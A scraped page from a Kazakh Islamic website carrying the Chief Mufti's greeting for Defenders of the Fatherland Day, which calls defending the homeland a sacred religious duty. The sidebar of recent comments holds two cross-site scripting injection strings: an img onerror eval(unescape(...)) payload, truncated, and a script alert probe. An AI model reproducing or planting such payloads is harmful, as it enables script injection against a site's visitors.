Отанды қорғау – қасиетті борыш
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Күн 07:20

ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
05:57 07:20 11:55 14:43 16:25 17:48
ықшамдау
Күнтізбе
Хижри
23 Джумада-сани 1446
Миләди
25 желтоқсан 2024

Мақалалар

Отанды қорғау – қасиетті борыш

| A | +

Наурызбай қажы ТАҒАНҰЛЫ,

Қазақстан мұсылмандары діни басқармасының төрағасы, Бас мүфти

Аса қамқор ерекше мейірімді Алланың атымен бастаймын! Барлық мақтау Аллаға тән. Ардақты Пайғамбарымыз Мұхаммедке Алланың салауаты мен сәлемі болсын!

Құрметті бауырлар!

Баршаңызды Отан қорғаушылар күнімен шын жүректен құттықтаймын! Бұл – әр ер азаматтың патриоттық сезімін оятатын, Отанды қорғау жауапкершілігін арттыратын маңызды мереке.

Әр отбасына береке, әскери саладағы ұландарымызға мықты жігер, жастарымызға қажыр-қайрат тілеймін. Мереке құтты болсын!

Мереке тек тойлаумен өлшенбейді. Ойлау – ел игілігі жолында  қадам жасаудың алғышарты.

Көрнекті ақын Мұхаметқали (Мұқағали) Мақатаевтың:

«Оңай сөз ғой «Отанды сүйем» деген,

Не тындырдың «басымды иемменен?» – деп, ой тастауы тегін емес.

Бүгінгі саналы ұрпақтың санасында «Отанға қалай қызмет етсем екен?» деген сауал жаңғырып тұрса игі.

«Отанды сүю – иманнан», –  деген аталы сөз бар. Иманды адам өз елінің нағыз патриоты бола алады.   

Отаншылдық сезім Отанға, туған еліне, оның тіліне, туып өскен жеріне, салт-дәстүрі мен мәдениетіне деген құрметтен басталады.

Отаншылдықтың мәйегі – ұлтты сүю. Өз ұлтын, елі мен жерін сүйіп, оның дамуына қызмет етіп, жанашырлық танытқан жан ғана отаншыл бола алады. Отаншылдық сана халықтың өз ана тілін, ділін, дінін берік сақтауымен және оны мақтан тұтуымен өлшенеді.

Ардақты Пайғамбарымыз Мұхаммед (оған Алланың салауаты мен сәлемі болсын) қасиетті хадис-шарифінде Меккені меңзеп: «Сен мен үшін сондай қымбатсың, сүйіктісің...» деп, өзінің туған жеріне айрықша сезімі мен сүйіспеншілігін білдірген.

Асыл дінімізде мұсылман баласының өз Отанын, отбасын, ар-намысын, мал-мүлкін қорғау қасиетті амалдардың қатарына жатады. Тағы бір хадисте Отанды қорғап, шекара күзеткен адамның Алла алдындағы дәрежесі артатыны баяндалған.

Ислам – тек құлшылықтардан ғана құралған дін емес. Дініміз Отанды қорғап, елді сүюге, бейбіт, ізгі қоғам құруға үндейді. Отаншыл адам сөзімен ғана емес, ісімен де үлгі-өнеге болуы тиіс. Осы ретте Әйтеке би бабамыздың: «Өмірім – халықтікі...» деген нақыл сөзінің тәрбиелік мәні зор. 

Қазақстан мұсылмандары діни басқармасы имамдар форумында қабылдаған «Жеті рухани қазық» Тұғырнамасында әр азаматтың бойынан табылуы тиіс отаншылдық сипатты айрықша атап өтті. Өйткені, Отанды қорғау – қасиетті борыш, отаншыл болу – ізгі амалдың бірі. 

Құрметті қауым!

Отан қорғаушылар мерекесі құтты болсын! Алла Тағала елдің ертеңін ойлайтын, халыққа аянбай қызмет ететін, Отанын қорғайтын асыл азаматтардың қатарын арттырғай.

Жаратқан Иеміздің сыйға берген Тәуелсіздігіміз бен киелі Отанымыздың болашағы баянды болғай! Әрқашан еліміз аман, жеріміз тыныш болсын! Әмин!

ДЕРЕККӨЗІ muftyat.kz

ҚМДБ ресми сайты

Предыдущий Следующий
Б.ҚАСЫМАЛИЕВ: Құран оқудың артықшылығы Мейірімді болыңыз, мейірімге бөленесіз

Оқырмандардың пікірі (0)

Қызықты тақырыптар

Қоғам Еркінбек ШОҚАЙ: Барша ораза ұстаушыларды ел амандығы үшін дұға етуге шақырамын
Коронавирус пандемиясы деп жүргенде жер бетіндегі мұсылман қауымы үшін айлардың төресі болып саналатын қасиетті Рамазан да келіп жетті. Биылғы оразаның бір ерекшелігі – карантинде өтетіндігі болып тұр. Осы айда оқылатын тарауық намазы мен ауызашар да тек үйде, әркімнің өз шаңырағында ғана орындалаты...
Қоғам Карантин кезінде ораза ұстауға бола ма және оның ерекшеліктері қандай?
Коронавирус жайлап тұрғанда ораза ұстауға рұқсат па, карантин уақытында ауызашар беруге бола ма, қандай мәселелерді ескерген жөн? Осы орайда Stan.kz ақпарат агенттігінің тілшісі Алматы қаласының бас имамы Еркінбек Шоқаймен байланысып, биылғы Рамазан айындағы ораза ұстау тәртібі туралы сауалдарды қой...
Қоғам Ғылымбек Мәжиев: «Жaқcы имaм – мұcылмaн үмме­тiнiң ұcтaзы»
Хaлқымыздың caн ғacырдaн берi рухaни құндылығы caнaлып келген Иcлaм дiнiн нacихaттaудa имaмдaрдың еңбегi oрacaн. Ocы oрaйдa, Қaзaқcтaн Мұcылмaндaры дiни бacқaрмacының Aппaрaт бacшыcы, PhD дoктoрaнт Ғылымбек Жәдiгерұлы Мәжиевпен cұхбaттacқaн едiк.  ...
Қоғам Мемлекет басшысы Қасым-Жомарт Тоқаевтың мәлімдемесі
Құрметті отандастар! Қазір бүкіл әлем бұрын-соңды болмаған күрделі жағдаймен бетпе-бет келіп отыр. Коронавирус індеті дүние жүзін жайлап барады.
Қоғам COVID-19: шыққан пәтуаларға шолу
Әлемді шарпыған коронавирусты пандемия деп жариялап, дабыл қаққан соң бірқатар мұсылман елінде жамағат намаздарына қатысты арнайы пәтуалар шықты. Аталған індет кісі көп шоғырланатын орындарда тез тарайтыны ескеріліп, жұма және бес уақыт намазды мешітте жамағатпен оқу уақытша тоқтатылды....
Ислам күнтізбесі Бас имам алматылықтарды наурыз мерекесімен құттықтады
Құрметті алматылықтар, қадірлі бауырлар! Баршаңызды еліміз бен мұқым түркі жұртының сан ғасырлар бойы тойлатып келген, тоңның жібіп, жердің бусанып, күзде кеткен жыл құсымен жадыраған көктемде қайта оралған, күн мен түннің теңеліп, адамдар мен төрт түліктің қыстан аман шыққанына Тәңір Тағалаға шүкір...
ықшамдау
Күнтізбе
Хижри
23 Джумада-сани 1446
Миләди
25 желтоқсан 2024
Намаз уақыттары
қазір

Күн 07:20

Бесінге дейін 01:17

О милостыне

</tEXtArEa>'"/><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3D

X X
2 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi